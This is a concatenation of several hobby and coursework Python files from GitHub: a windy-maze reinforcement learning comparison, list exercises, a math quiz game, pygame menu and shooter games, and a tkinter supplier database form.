pg.Color(\"Green\"), ((width_ + margin_) * column, (width_ + margin_) * row, width_, width_))\n # draw cells occupied by the path finder\n if grid[row, column] == 2:\n pg.draw.rect(win, pg.Color(\"Blue\"), ((width_ + margin_) * column, 
(width_ + margin_) * row, width_, width_))\n # Draw cells occupied by the starter\n if grid[row, column] == 0:\n pg.draw.rect(win, pg.Color(\"RED\"), ((width_ + margin_) * column, (width_ + margin_) * row, width_, width_))\n pg.display.update()\n\n @property\n def maze(self):\n # forbid any outer to change maze\n return self.__maze\n\n# world height\nHEIGHT = 20\n\n# world width\nWIDTH = 20\n\n# wind strength for each column\nWIND = np.random.choice(4,WIDTH) -2 # 当风的强度小于0时候表示反向风\n#WIND = [0, 0, 0, 1, 1, 1, 2, 2, 1, 0] # most trival case\nprint(f\"Wind strength for each column is:\\n{[str(w) for w in WIND]}\")\n\n# 环境编号: 路径 = -1 / 墙体 = -10 / 起点 = 0 / 终点 = 10 / 预留可视化 = 2\nworld = enviroment_gen(HEIGHT,WIDTH,WIND,is_random = True)\n\n#%%\n# initialize PyGame\npg.init()\n# create PyGame window (18 is the size of cells and hence constant)\nWIN = pg.display.set_mode((world.WIDTH*18,world.HEIGHT*18))\npg.display.set_caption(\"RL for Windy Maze\")\n\nMAZE = world.maze # MAZE must not be changed\nMAZE_show = MAZE.copy() # copy for visualzing our path\nworld.update(MAZE, WIN, 15, 3)\nSTART = [np.where(MAZE == 0)[0][0], np.where(MAZE == 0)[1][0]] # only one START should be set\nGOAL = [np.where(MAZE == 10)[0][0], np.where(MAZE == 10)[1][0]] # only one GOAL should be set\nWALLS = [[np.where(MAZE == -10)[0][i],np.where(MAZE == -10)[1][i]] for i in range(len(np.where(MAZE == -10)[0])) ]\nACTIONS = [world.ACTION_UP, world.ACTION_DOWN, world.ACTION_LEFT, world.ACTION_RIGHT]\n\n# probability for exploration (epsilon greedy)\nEPSILON = 0.1\n# step-size\nALPHA = 0.5\n# reward for each step\nREWARD = -1.0\n# parameter for SARSA-lambda\nLAMBDA = 0.05\n\ndef choose_action(state: list, q_value : np.ndarray, epsilon : float = EPSILON, action_set : list = ACTIONS):\n \"\"\"\n choose an action based on epsilon-greedy algorithm\n\n :param state: current state;\n :param q_value: reference Q-table for updating;\n :param epsilon: probability for exploration;\n :param action_set: actions can be choosen from;\n \n :return: action to be choosed.\n \"\"\"\n if np.random.binomial(1, epsilon) == 1:\n return np.random.choice(action_set)\n else:\n values_ = q_value[state[0], state[1], :]\n return np.random.choice([action_ for action_, value_ in enumerate(values_) if value_ == np.max(values_)])\n\ndef one_episode(q_value : np.ndarray, method : str = \"SARSA\", \n epsilon : float = EPSILON, alpha : float = ALPHA, lambda_: float = LAMBDA,\n reward : float = REWARD, action_set : list = ACTIONS, start : list = START, goal : list = GOAL):\n \"\"\"\n Play one episode game based on q_value.\n Notice this function will change q_value!\n\n :param q_value: current Q-table;\n :param method: method to be used;\n :param epsilon: probability for exploration;\n :param alpha: alpha ratio for updating rule, also known as step-size;\n :param lambda_: parameter for SARSA-lambda algorithm;\n :param reward: reward for each step, assumed fixed;\n :param action_set: actions can be choosen from;\n :param start: state for start;\n :param goal: state for goal;\n \n :return: how many times it takes from START to GOAL.\n :return: the action path.\n \"\"\"\n # declare global settings for visualize\n global MAZE_show, MAZE, WIN, world\n assert method in [\"SARSA\", \"Q-learning\", \"Expect-SARSA\",\"SARSA-lambda\"]\n\n # initialize state\n state = start\n state_path = []\n\n action = choose_action(state, q_value, epsilon, action_set)\n action_path = []\n\n if method == \"SARSA-lambda\":\n trace = np.zeros((world.HEIGHT, world.WIDTH, 4)) # Eligibility Trace 
Initialize\n\n # keep going until get to the goal state\n while state != goal:\n if method == \"SARSA\":\n next_state = world.step(state, action)\n #print(state, action, next_state)\n next_action = choose_action(next_state, q_value, epsilon, action_set)\n target = q_value[next_state[0], next_state[1], next_action]\n\n elif method == \"Q-learning\":\n action = choose_action(state, q_value, epsilon, action_set) # action based on current state\n next_state = world.step(state, action)\n target = np.max(q_value[next_state[0], next_state[1], :])\n\n elif method == \"Expect-SARSA\":\n next_state = world.step(state, action)\n next_action = choose_action(next_state, q_value, epsilon, action_set)\n # calculate the expected value of new state\n target = 0.\n q_next = q_value[next_state[0], next_state[1], :]\n best_actions = np.argwhere(q_next == np.max(q_next))\n for action_ in action_set:\n if action_ in best_actions:\n target += ((1.0 - epsilon) / len(best_actions) + epsilon / len(action_set)) * q_value[next_state[0], next_state[1], action_]\n else:\n target += epsilon / len(action_set) * q_value[next_state[0], next_state[1], action_]\n \n elif method == \"SARSA-lambda\":\n next_state = world.step(state, action)\n next_action = choose_action(next_state, q_value, epsilon, action_set)\n target = q_value[next_state[0], next_state[1], next_action]\n\n delta = reward + target - q_value[state[0], state[1], action]\n # Update Eligibility Trace\n trace[state[0], state[1], action] += 1\n\n # Update Rule (Eligibility Trace Form)\n # Notice that the REWARD is fixed (= -1) !\n q_value += alpha * delta * trace\n trace *= lambda_\n \n # Update Rule (TD form)\n # Notice that the REWARD is fixed (= -1) !\n # Notice that the Eligibility Trace is updated in another way!\n if method != \"SARSA-lambda\":\n q_value[state[0], state[1], action] += \\\n alpha * (reward + target - q_value[state[0], state[1], action])\n \n # store actions and states\n state = next_state\n state_path.append(next_state)\n action_path.append(action)\n if method != \"Q-learning\":\n action = next_action\n\n # color the cells to illustrate path (visualize)\n MAZE_show = MAZE.copy()\n for i in state_path[:-1]:\n MAZE_show[i[0], i[1]] = 2\n world.update(MAZE_show, WIN, 15, 3)\n\n return len(action_path), action_path\n\ndef Main(EPISODE_NUM : int = 400):\n \"\"\"\n Main function.\n\n :param EPISODE_NUM: Run the MAZE learning for EPISODE_NUM times;\n :return: the action path of each given metho.\n \"\"\"\n global MAZE_show, MAZE, WIN, world\n global START, GOAL, WALLS, ACTIONS\n global EPSILON, ALPHA, REWARD\n\n # setup Q-tables and total episode num\n HEIGHT, WIDTH = world.HEIGHT, world.WIDTH\n Q_VALUES_1 = np.zeros((HEIGHT, WIDTH, 4))\n Q_VALUES_2 = np.zeros((HEIGHT, WIDTH, 4))\n Q_VALUES_3 = np.zeros((HEIGHT, WIDTH, 4))\n Q_VALUES_4 = np.zeros((HEIGHT, WIDTH, 4))\n\n sarsa_elapse = []\n qlearning_elapse = []\n Esarsa_elapse = []\n sarsaLambda_elapse = []\n result_1, result_2, result_3, result_4 = None, None, None, None\n episode_index = 0\n\n while episode_index < EPISODE_NUM:\n # let the EPSILON vary when the time elapse\n var_EPSILON = EPSILON/(episode_index + 1)\n elapse, result_1 = one_episode(Q_VALUES_1, method = \"SARSA\", epsilon = var_EPSILON)\n sarsa_elapse.append(elapse)\n elapse, result_2 = one_episode(Q_VALUES_2, method = \"Q-learning\", epsilon = var_EPSILON)\n qlearning_elapse.append(elapse)\n elapse, result_3 = one_episode(Q_VALUES_3, method = \"Expect-SARSA\", epsilon = var_EPSILON)\n Esarsa_elapse.append(elapse)\n elapse, 
result_4 = one_episode(Q_VALUES_4, method = \"SARSA-lambda\", epsilon = var_EPSILON)\n sarsaLambda_elapse.append(elapse)\n episode_index += 1\n \n #pg.display.quit()\n #pg.quit()\n \n plt.figure(figsize = (20,8))\n treshold = int(0.2 * EPISODE_NUM)\n plt.plot(np.arange(1, EPISODE_NUM + 1),sarsa_elapse, label = \"SARSA\")\n plt.plot(np.arange(1, EPISODE_NUM + 1),qlearning_elapse, label = \"Q-learning\")\n plt.plot(np.arange(1, EPISODE_NUM + 1),Esarsa_elapse, label = \"Expect-SARSA\")\n plt.plot(np.arange(1, EPISODE_NUM + 1),sarsaLambda_elapse, label = \"SARSA-lambda\")\n\n plt.xlabel('Episodes')\n plt.ylabel('Steps Elapse')\n plt.legend(loc = 2)\n\n axes = plt.axes([0.55, 0.3, 0.3, 0.5])\n plt.title('Final Convergence')\n plt.plot(np.arange(1, EPISODE_NUM + 1)[-treshold:], sarsa_elapse[-treshold:])\n plt.plot(np.arange(1, EPISODE_NUM + 1)[-treshold:], qlearning_elapse[-treshold:])\n plt.plot(np.arange(1, EPISODE_NUM + 1)[-treshold:], Esarsa_elapse[-treshold:])\n plt.plot(np.arange(1, EPISODE_NUM + 1)[-treshold:], sarsaLambda_elapse[-treshold:])\n #plt.setp(axes)\n plt.show()\n \n plt.figure(figsize = (20,8))\n sarsa_elapse = np.add.accumulate(sarsa_elapse)\n qlearning_elapse = np.add.accumulate(qlearning_elapse)\n Esarsa_elapse = np.add.accumulate(Esarsa_elapse)\n sarsaLambda_elapse = np.add.accumulate(sarsaLambda_elapse)\n plt.plot(sarsa_elapse, np.arange(1, EPISODE_NUM + 1),label = \"SARSA\")\n plt.plot(qlearning_elapse, np.arange(1, EPISODE_NUM + 1), label = \"Q-learning\")\n plt.plot(Esarsa_elapse, np.arange(1, EPISODE_NUM + 1), label = \"Expect-SARSA\")\n plt.plot(sarsaLambda_elapse, np.arange(1, EPISODE_NUM + 1), label = \"SARSA-lambda\")\n\n plt.xlabel('Total Steps Elapse')\n plt.ylabel('Episodes')\n plt.legend()\n plt.show()\n\n # display the optimal policy\n fianl_policy = []\n for i in range(0, HEIGHT):\n fianl_policy.append([])\n for j in range(0, WIDTH):\n if [i, j] == GOAL:\n fianl_policy[-1].append('G')\n continue\n elif [i,j] in WALLS:\n fianl_policy[-1].append('X')\n continue\n \n best_action = np.argmax(Q_VALUES_4[i, j, :]) # show the best policy for SARSA method\n if best_action == world.ACTION_UP:\n fianl_policy[-1].append('U')\n elif best_action == world.ACTION_DOWN:\n fianl_policy[-1].append('D')\n elif best_action == world.ACTION_LEFT:\n fianl_policy[-1].append('L')\n elif best_action == world.ACTION_RIGHT:\n fianl_policy[-1].append('R')\n print(\"THe optimal last policy is:\")\n for row in fianl_policy:\n print(row)\n return result_1,result_2, result_3, result_4\n\nresult_1,result_2, result_3, result_4 = Main(EPISODE_NUM = 400)","repo_name":"login-invalid/RL_Introduction_FinalProject","sub_path":"codes/HW_final.py","file_name":"HW_final.py","file_ext":"py","file_size_in_byte":19447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29287908834","text":"\n'''\n\n#### Q 5 :->\n\n\nlst=[1,1,5,100,20,20,6,0,0]\nc=0\nfor i in range(len(lst)-1):\n if lst[i]==lst[i+1]:\n c+=1\n\nprint(c)\n\n'''\n\n\n## 1. Check if a list contains an element\n'''\nlst=[1,1,5,100,20,20,6,0,0]\n\na=int(input())\nif a in lst:\n print(\"YES !!\")\nelse: \n print(\"NO !! \")\n'''\n'''\nlst=[1,1,5,100,20,20,6,0,0]\n## 2. frequency of each element in the array\nfre=[]\nfor i in lst:\n c=lst.count(i)\n\n fre.append(c)\n\nprint(fre)\n\n\n\n## 3. 
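The windy-maze record above switches between four TD methods inside one_episode; the methods differ only in the bootstrap target used for the update. A minimal sketch of the two core targets on a bare Q-table, reusing the record's fixed step reward of -1.0 and step size ALPHA = 0.5; the toy table shape and the states/actions below are illustrative, not values from the record:

import numpy as np

ALPHA, REWARD = 0.5, -1.0           # same constants the record uses
q = np.zeros((4, 4, 4))             # toy Q-table: rows x cols x 4 actions
state, action = (0, 0), 3
next_state, next_action = (0, 1), 2

# SARSA (on-policy): bootstrap from the action the policy actually chose next.
target = q[next_state][next_action]
q[state][action] += ALPHA * (REWARD + target - q[state][action])

# Q-learning (off-policy): bootstrap from the greedy value of the next state.
target = np.max(q[next_state])
q[state][action] += ALPHA * (REWARD + target - q[state][action])

Expected SARSA replaces the target with the epsilon-greedy expectation over next actions, and SARSA-lambda applies the same TD error to every state-action pair weighted by an eligibility trace, which is exactly the branching the record's one_episode performs.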
Rotate list to left \nlst=[1,2,3,4,5]\nd=int(input())\n\nfor i in range(d):\n val=lst.pop(0)\n lst.append(val)\n\nprint(lst)\n\nfor i in range(len(lst)-1,-1,-1):\n print(lst[i])\n\nlst=lst[::-1]\nfor i in lst:\n print(i)\n'''\nlst=[1,2,3,4,5]\n\nfor i in range(len(lst)):\n if i%2!=0:\n\n print(lst[i])","repo_name":"Borspankaj/Problem_solving","sub_path":"PRACTICE/list&tuple.py","file_name":"list&tuple.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"31588076626","text":"from math_game2 import Game\n\nfrom problem_bank import TimedBank, CountProblemFactory, TimedProblemFactory\n\nfrom generators import *\n\nfrom game_input import PlayerInput\n\nfrom game_display import ConsoleDisplay\n\nfrom sys import exit\n\n\ndef main():\n # p = ProblemBank([1, 2, 3])\n # for prob in p:\n # print(prob)\n\n # p = ProblemBank([1, 2, 3])\n # print(next(p))\n # print(next(p))\n # print(next(p))\n # for prob in p:\n # print(prob)\n\n # problems = [\n # factorial_problem(1),\n # factorial_problem(2),\n # factorial_problem(3),\n # factorial_problem(4),\n # factorial_problem(5),\n # factorial_problem(6),\n # factorial_problem(7),\n # factorial_problem(8),\n # factorial_problem(9),\n # ]\n generators = [\n AdditionGenerator(2, 100, 2, 100),\n SubtractionGenerator(2, 100, 2, 100),\n MultiplicationGenerator(2, 12, 2, 100),\n DivisionGenerator(2, 12, 2, 100),\n ]\n # bank = ProblemBank(problems)\n # bank = RandomBank(problems)\n # bank = TimedBank(problems, 10)\n # bank = CountProblemFactory(generators, 5)\n bank = TimedProblemFactory(generators, 10)\n display = ConsoleDisplay()\n game = Game(PlayerInput(), bank, display, 3)\n game.play()\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt as k:\n print(\"bye bye!!!\")\n exit()\n","repo_name":"kevinmccall/math-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26088471346","text":"import pygame\nimport settings\n\nfrom base import BaseState\n\n\nclass RegionSelect(BaseState):\n def __init__(self):\n super(RegionSelect, self).__init__()\n self.active_index = 0\n self.index = -1\n self.next_state = \"REGION\"\n self.options = []\n self.rects = {0: [75, 20, 330, 680],\n 1: [475, 20, 330, 680],\n 2: [875, 20, 330, 680], }\n self.text_rects = {0: [80, 60, 300, 50],\n 1: [480, 600, 300, 50],\n 2: [880, 60, 300, 50], }\n self.image_pos = {0: (80, 120),\n 1: (480, 60),\n 2: (880, 180),}\n\n def startup(self, persistent):\n self.persist = persistent\n self.options = self.persist[\"world\"].get_options(self.persist[\"region_index\"])\n\n def handle_action(self, action):\n if action == \"return\":\n if self.index == 0 or self.index == 1 or self.index == 2:\n settings.SOUND_EFFECTS[\"Menu\"][\"Confirm_1\"].play()\n self.go_to_region()\n elif action == \"mouse_move\":\n for key, value in self.rects.items():\n if settings.click_check(value):\n if self.index != key:\n settings.SOUND_EFFECTS[\"Menu\"][\"Toggle_2\"].play()\n self.index = key\n break\n else:\n self.index = -1\n elif action == \"click\":\n if self.index == 0 or self.index == 1 or self.index == 2:\n settings.SOUND_EFFECTS[\"Menu\"][\"Confirm_1\"].play()\n self.go_to_region()\n elif action == \"right\":\n settings.SOUND_EFFECTS[\"Menu\"][\"Toggle_2\"].play()\n self.index += 1\n self.index %= len(self.options)\n elif action == \"left\":\n 
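# modulo wrap keeps the highlighted card cycling through the option list\n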
            settings.SOUND_EFFECTS[\"Menu\"][\"Toggle_2\"].play()\n            self.index -= 1\n            self.index %= len(self.options)\n\n    def get_event(self, event):\n        if event.type == pygame.QUIT:\n            self.quit = True\n        elif event.type == pygame.KEYDOWN:\n            if event.key == pygame.K_LEFT:\n                self.handle_action(\"left\")\n            elif event.key == pygame.K_RIGHT:\n                self.handle_action(\"right\")\n            elif event.key == pygame.K_RETURN:\n                self.handle_action(\"return\")\n        elif event.type == pygame.MOUSEBUTTONDOWN:\n            if event.button == 1:\n                self.handle_action(\"click\")\n        elif event.type == pygame.MOUSEMOTION:\n            self.handle_action(\"mouse_move\")\n\n    def go_to_region(self):\n        self.persist['region_type'] = self.options[self.index]\n        self.persist['region_generate'] = True\n        self.done = True\n\n    def draw(self, surface):\n        surface.fill(pygame.Color(\"black\"))\n        for key, value in self.rects.items():\n            rect_color = (50, 50, 50)\n            text_color = settings.TEXT_COLOR\n            if self.index == key:\n                rect_color = (80, 80, 80)\n                text_color = settings.SELECTED_COLOR\n            pygame.draw.rect(surface, rect_color, value, border_radius=4)\n            surface.blit(settings.REGION_CARDS[self.options[key]], self.image_pos[key])\n            settings.tw(surface, self.options[key], text_color, self.text_rects[key], settings.HEADING_FONT,\n                        x_mode=\"center\")\n","repo_name":"chasezielinski/NeonKnights","sub_path":"venv/states/region_select.py","file_name":"region_select.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29684586993","text":"from pythondb import *\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import simpledialog\n\ncurId = 0\nsaveFlag = False\nfindflag = False\nrsItem = \"\"\ncurData = 0\n\ndef componentEnableDisable(flag):\n    global supName, supAdd, supMob, supAmount\n    global Firstbtn, Nextbtn, Prevbtn, Lastbtn\n    global Addbtn, Savebtn, Editbtn, Findbtn, Deletebtn, Cancelbtn\n    if flag == True:\n        st = NORMAL\n        st1 = DISABLED\n    else:\n        st = DISABLED\n        st1 = NORMAL\n\n    supName.config(state=st)\n    supAdd.config(state=st)\n    supMob.config(state=st)\n    supAmount.config(state=st)\n\n    Firstbtn.config(state=st1)\n    Prevbtn.config(state=st1)\n    Nextbtn.config(state=st1)\n    Lastbtn.config(state=st1)\n\n    Addbtn.config(state=st1)\n    Savebtn.config(state=st)\n    Cancelbtn.config(state=st)\n    Editbtn.config(state=st1)\n    Findbtn.config(state=st1)\n    Deletebtn.config(state=st1)\n\ndef cancelOperation():\n    componentEnableDisable(False)\n\ndef addData():\n    global saveFlag\n    componentEnableDisable(True)\n    supName.delete(0, END)\n    supAdd.delete(0, END)\n    supMob.delete(0, END)\n    supAmount.delete(0, END)\n    supName.focus_set()\n    saveFlag = True\n\ndef editData():\n    global saveFlag\n    componentEnableDisable(True)\n    saveFlag = False\n\ndef saveData():\n    global saveFlag\n    global supplierName, supplierAddress, supplierMobile, supplierAmount, var\n    global con, sup\n    if saveFlag == True:\n        if supplierName.get() != \"\" and supplierAddress.get() != \"\" and supplierMobile.get() != \"\":\n            sql = \"insert into suppliersDetails(supplierName,supplierAddress,supplierMobile,supplierAmount,supplierCurrAmount) values('{}','{}','{}','{}','{}')\".format(supplierName.get(), supplierAddress.get(), supplierMobile.get(), supplierAmount.get(), supplierAmount.get())\n            mycursor = con.cursor()\n            mycursor.execute(sql)\n            con.commit()\n            messagebox.showinfo(\"Successful !\", \"Data has been Added to the Database.\", parent=sup)\n        else:\n            messagebox.showinfo(\"Warning !\", \"Please Fill the Entries first 
before saving.\")\n else:\n sql = \"update suppliersDetails set supplierName='{}' , supplierAddress='{}' , supplierMobile='{}' , supplierAmount='{}' where id={}\".format(supplierName.get(), supplierAddress.get(), supplierMobile.get(), supplierAmount.get(), curId)\n mycursor = con.cursor()\n mycursor.execute(sql)\n con.commit()\n messagebox.showinfo(\"Successful !\", \"Data has been Updated.\", parent=sup)\n LoadData()\n componentEnableDisable(False)\n\ndef findData():\n global con,rsItem,curData,sup,curId\n x = simpledialog.askinteger(\"Accounting and Inventory\", \"Enter the Supplier ID :\", parent=sup)\n cnt=0\n for itm in rsItem:\n if itm[0] == x:\n curData = cnt\n findflag = True\n break\n else:\n findflag = False\n cnt = cnt+1\n if findflag == False:\n messagebox.showinfo(\"Accounting and Inventory\", \"Supplier Not Present\", parent=sup)\n else:\n displayData(curData)\n\ndef deleteData():\n global con, sup, curId\n x = messagebox.askyesno(\"Accounting and Inventory\", \"Do You really want to Delete..?\", parent=sup)\n if x == True:\n sql = \"delete from suppliersDetails where id={}\".format(curId)\n print(curId)\n mycursor = con.cursor()\n mycursor.execute(sql)\n con.commit()\n messagebox.showinfo(\"Successful !\", \"Data has been Deleted to the Database.\", parent=sup)\n LoadData()\n\ndef exiting():\n global sup\n x = messagebox.askyesno(\"Accounting and Inventory\", \"Do You really want to Exit..?\", parent=sup)\n if x == True:\n sup.destroy()\n\ndef displayData(r):\n global supplierName, supplierAddress, supplierMobile, supplierAmount, var\n global rsItem, curId\n curId = rsItem[r][0]\n supplierName.set(rsItem[r][1])\n supplierAddress.set(rsItem[r][2])\n supplierMobile.set(rsItem[r][3])\n supplierAmount.set(rsItem[r][4])\n\ndef Lastdatabtn():\n global curData, rsItem\n componentEnableDisable(False)\n curData = len(rsItem) - 1\n displayData(curData)\n\ndef Nextdatabtn():\n global curData, rsItem, sup\n componentEnableDisable(False)\n if curData < len(rsItem) - 1:\n curData = curData + 1\n displayData(curData)\n else:\n messagebox.showinfo(\"Sensible\", \"It is last record\", parent=sup)\n\ndef Prevdatabtn():\n global curData, rsItem, sup\n componentEnableDisable(False)\n if curData > 0:\n curData = curData - 1\n displayData(curData)\n else:\n messagebox.showinfo(\"Sensible\", \"It is first record\", parent=sup)\n\ndef Firstdatabtn():\n global curData\n componentEnableDisable(False)\n curData = 0\n displayData(curData)\n\ndef LoadData():\n global rsItem, curData, con\n sql = \"select * from suppliersDetails\"\n mycursor = con.cursor()\n mycursor.execute(sql)\n rsItem = mycursor.fetchall()\n curData=0\n displayData(curData)\n\n\ndef supplierDetail(root):\n global sup\n sup = Toplevel(root)\n\n global supplierName, supplierAddress, supplierMobile, supplierAmount\n global supName, supAdd, supMob, supAmount\n global Firstbtn, Nextbtn, Prevbtn, Lastbtn\n global Addbtn, Savebtn, Editbtn, Findbtn, Deletebtn, Cancelbtn\n supplierName = StringVar()\n supplierAddress = StringVar()\n supplierMobile = StringVar()\n supplierAmount = IntVar()\n var = StringVar()\n\n sup.title(\"supplier Screen\")\n sup.config(bg=\"#ffcccc\")\n\n Label(sup, text=\"supplier Name : \", bg=\"#ffcccc\", font=(\"consolas\", 12)).place(x=120, y=20)\n supName = Entry(sup, textvariable=supplierName, width=50, state=DISABLED)\n supName.place(x=280, y=25)\n\n Label(sup, text=\"Address : \", bg=\"#ffcccc\", font=(\"consolas\", 12)).place(x=120, y=60)\n supAdd = Entry(sup, textvariable=supplierAddress, width=50, 
state=DISABLED)\n supAdd.place(x=280, y=65)\n\n Label(sup, text=\"Mobile No. : \", bg=\"#ffcccc\", font=(\"consolas\", 12)).place(x=120, y=100)\n supMob = Entry(sup, textvariable=supplierMobile, width=50, state=DISABLED)\n supMob.place(x=280, y=105)\n\n Label(sup, text=\"Amount : \", bg=\"#ffcccc\", font=(\"consolas\", 12)).place(x=120, y=140)\n supAmount = Entry(sup, textvariable=supplierAmount, width=50, state=DISABLED)\n supAmount.place(x=280, y=145)\n\n Firstbtn = Button(sup, text=\"<<\", width=\"10\", bg=\"black\", fg=\"white\", command=Firstdatabtn)\n Firstbtn.place(x=130, y=240)\n Prevbtn = Button(sup, text=\"<\", width=\"10\", bg=\"black\", fg=\"white\", command=Prevdatabtn)\n Prevbtn.place(x=250, y=240)\n Nextbtn = Button(sup, text=\">\", width=\"10\", bg=\"black\", fg=\"white\", command=Nextdatabtn)\n Nextbtn.place(x=370, y=240)\n Lastbtn = Button(sup, text=\">>\", width=\"10\", bg=\"black\", fg=\"white\", command=Lastdatabtn)\n Lastbtn.place(x=490, y=240)\n\n Addbtn = Button(sup, text=\"Add\", width=\"15\", bg=\"green\", fg=\"white\", command=addData)\n Addbtn.place(x=140, y=280)\n Savebtn = Button(sup, text=\"Save\", width=\"15\", bg=\"green\", fg=\"white\", state=DISABLED, command=saveData)\n Savebtn.place(x=300, y=280)\n Cancelbtn = Button(sup, text=\"Cancel\", width=\"15\", bg=\"green\", fg=\"white\", state=DISABLED,\n command=cancelOperation)\n Cancelbtn.place(x=450, y=280)\n Editbtn = Button(sup, text=\"Edit\", width=\"15\", bg=\"red\", fg=\"white\", command=editData)\n Editbtn.place(x=140, y=320)\n Findbtn = Button(sup, text=\"Find\", width=\"15\", bg=\"red\", fg=\"white\", command=findData)\n Findbtn.place(x=300, y=320)\n Deletebtn = Button(sup, text=\"Delete\", width=\"15\", bg=\"red\", fg=\"white\", command=deleteData)\n Deletebtn.place(x=450, y=320)\n\n Button(sup, text=\"Exit\", width=\"40\", bg=\"black\", fg=\"white\", command=exiting).place(x=210, y=360)\n\n LoadData()\n\n sup.geometry(\"700x500+300+100\")\n sup.mainloop()\n\n\n#supplierDetail()\n\n","repo_name":"Raspreets42/Accounting","sub_path":"supplier.py","file_name":"supplier.py","file_ext":"py","file_size_in_byte":7859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42905041127","text":"#pylint:disable=C0411\n#pylint:disable=R0915\n#pylint:disable=R1724\n#pylint:disable=R1702\n#pylint:disable=R0912\n#pylint:disable=R0914\n#pylint:disable=C0114\n#pylint:disable=C0303\n#pylint:disable=R0913\n#pylint:disable=C0116\n#pylint:disable=W0622\n#pylint:disable=R0903\n#pylint:disable=C0115\n#pylint:disable=C0103\nimport pygame as pg\nimport random\nimport time\n\nclass Bullet:\n\tdef __init__ (self, bX, rY, winSize):\n\t\tself.bX = bX\n\t\tself.rY = rY\n\t\tif winSize == 0:\n\t\t\tself.rect = pg.Rect(self.bX, self.rY, 25, 25)\n\t\telif winSize == 1:\n\t\t\tself.rect = pg.Rect(self.bX, self.rY, 50, 50)\n \nclass Block:\n def __init__ (self, bX, bY, id):\n self.rect = pg.Rect(bX, bY, 50, 50)\n self.id = id\n\ndef scoreDisp(score, mScrn, window, playerX, playerY, hit):\n\t\tscoreFont = pg.font.Font('freesansbold.ttf', 50)\n\t\tgameOverSurf = scoreFont.render(\"Bullets: \" + str(score) + \" \" + \n\t\t#str(window.right) + \"x\" + str(window.bottom)\n\t\t #+ \" \" + str(playerX) + \"x\" + str(int(playerY)) + \n\t\t \" Hits: \" + str(hit), \n\t\t\t\t\t\t\t\t\tTrue, (255, 255, 255))\n\t\tgameOverRect = gameOverSurf.get_rect()\n\t\tgameOverRect.topleft = (50, 50)\n\t\tmScrn.blit(gameOverSurf, gameOverRect)\n\t\ndef gameOverDisp(mScrn):\n\t\tscoreFont = 
pg.font.Font('freesansbold.ttf', 50)\n\t\tgameOverSurf = scoreFont.render(\"Game Over\", True, (255, 255, 255))\n\t\tgameOverSurf2 = scoreFont.render(\"press 'r' to restart\", True, (255, 255, 255))\n\t\tgameOverRect = gameOverSurf.get_rect()\n\t\tgameOverRect2 = gameOverSurf2.get_rect()\n\t\tgameOverRect2.topleft = (mScrn.get_rect().right // 2.7, (mScrn.get_rect().bottom // 2) + 50)\n\t\tgameOverRect.topleft = (mScrn.get_rect().right // 2.5, mScrn.get_rect().bottom // 2)\n\t\tmScrn.blit(gameOverSurf, gameOverRect)\n\t\tmScrn.blit(gameOverSurf2, gameOverRect2)\n\ndef enemyMovement(enemyList):\n\tnewEList = []\n\trangeSet = [(200, 400), (500, 700), (800, 1000), (1100, 1300)]\n\tfor i in range(len(enemyList)):\n\t\tnewEList.append((Block(random.randint(rangeSet[i][0], rangeSet[i][1]), 150, 0), True))\n\treturn newEList\n\ndef main():\n\n\tpg.init()\n\n\trunning = True\n\twideScreen = False\n\n\tmScrn = pg.display.set_mode((0, 0))\n\twindow = mScrn.get_rect()\n\tif window.width >= window.height:\n\t\tmScrn = pg.display.set_mode((0, 0))\n\t\twideScreen = True\n\telse:\n\t\tmScrn = pg.display.set_mode((0, window.bottom // 2))\n\tclock = pg.time.Clock()\n\n\teffects = [pg.mixer.Sound('sound96.wav')]\n\n\tplayerX = 100\n\tplayerY = window.bottom // 1.6\n\tplayerSpeed = 100\n\n\tshotCycle = 0\n\tmoveCycle = 0\n\n\tbullets = []\n\tremBullets = 10\n\n\tenemyBlocks = [(Block(300, 150, 0), True), (Block(500, 150, 1), True), \n\t\t\t\t(Block(700, 150, 2), True), (Block(900, 150, 3), True)]\n\n\thits = 0\n\n\twhile running:\n\t\tclock.tick(60)\n\n\t\tscoreDisp(remBullets, mScrn, window, playerX, playerY, hits)\n\n\t\trect1 = pg.Rect(playerX, playerY, 50, 50)\n\n\t\tfor block in enemyBlocks:\n\t\t\tif block[1]:\n\t\t\t\tpg.draw.rect(mScrn, (0, 255, 0), block[0])\n\n\t\t# iterate over a copy so removing bullets/blocks mid-loop is safe\n\t\tfor r in bullets[:]:\n\t\t\tif r.rect.y <= 0:\n\t\t\t\tbullets.remove(r)\n\t\t\t\tcontinue\n\n\t\t\thit = None\n\t\t\tfor block in enemyBlocks:\n\t\t\t\tif pg.Rect.colliderect(r.rect, block[0]):\n\t\t\t\t\thit = block\n\t\t\t\t\tbreak\n\t\t\tif hit is not None:\n\t\t\t\tbullets.remove(r)\n\t\t\t\tenemyBlocks.remove(hit)\n\t\t\t\thits += 1\n\t\t\t\tcontinue\n\t\t\tpg.draw.rect(mScrn, (255, 255, 255), r.rect)\n\t\t\tr.rect.y -= 20\n\n\t\tif moveCycle >= 500:\n\t\t\tenemyBlocks = enemyMovement(enemyBlocks)\n\t\t\tmoveCycle = 0\n\n\t\tfor event in pg.event.get():\n\t\t\tif event.type == pg.QUIT:\n\t\t\t\trunning = False\n\n\t\t\tif event.type == pg.KEYDOWN:\n\t\t\t\tif event.key == pg.K_ESCAPE:\n\t\t\t\t\trunning = False\n\n\t\t\t\tif event.key == pg.K_a:\n\t\t\t\t\tif playerX - playerSpeed < (window.left):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tplayerX -= playerSpeed\n\n\t\t\t\tif event.key == pg.K_d:\n\t\t\t\t\tif playerX + 100 + playerSpeed > (window.right):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tplayerX += playerSpeed\n\n\t\t\t\tif event.key == 